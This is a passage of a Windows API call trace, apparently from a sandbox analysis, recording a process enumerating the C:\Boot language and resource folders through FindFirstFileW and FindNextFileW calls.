nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0156.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.980] FindFirstFileW (in: lpFileName="C:\\Boot\\lv-LV\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728348 [0156.981] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.981] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.981] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12758, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.981] FindClose (in: hFindFile=0x728348 | out: hFindFile=0x728348) returned 1 [0156.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.982] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0156.982] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0156.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.982] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e08 [0156.982] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.983] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.983] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.983] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef62cf52, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.983] FindClose (in: hFindFile=0x727e08 | out: hFindFile=0x727e08) returned 1 [0156.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.983] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0156.983] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.983] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728188 [0156.983] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e4fa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6407cf, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.984] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.984] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.984] FindNextFileW (in: hFindFile=0x728188, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6407cf, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fb5e6c, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.984] FindClose (in: hFindFile=0x728188 | out: hFindFile=0x728188) returned 1 [0156.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.984] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0156.984] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.984] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727cc8 [0156.985] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef65403a, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.985] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.985] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.985] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65403a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.985] FindClose (in: hFindFile=0x727cc8 | out: hFindFile=0x727cc8) returned 1 [0156.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.985] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0156.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.985] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728408 [0156.986] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6678d6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef6678d6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.986] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.987] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.987] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef65dc94, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.987] FindClose (in: hFindFile=0x728408 | out: hFindFile=0x728408) returned 1 [0156.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.987] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0156.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.987] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728248 [0157.101] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f167, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6714dc, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.101] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2112e17f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0157.101] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0157.101] FindNextFileW (in: hFindFile=0x728248, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6714dc, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f8fc0d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0157.101] FindClose (in: hFindFile=0x728248 | out: hFindFile=0x728248) returned 1 [0157.101] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.101] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0157.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0157.102] FindFirstFileW (in: lpFileName="C:\\Boot\\qps-ploc\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e88 [0157.102] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010f640, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef684d85, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.102] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12160, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0157.102] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0157.102] FindNextFileW (in: hFindFile=0x727e88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef684d85, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbd1a998, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xd398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0157.102] FindClose (in: hFindFile=0x727e88 | out: hFindFile=0x727e88) returned 1 [0157.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0157.102] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9abff9, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0157.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0157.102] FindFirstFileW (in: lpFileName="C:\\Boot\\Resources\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4c33ce4, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa01ab61e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 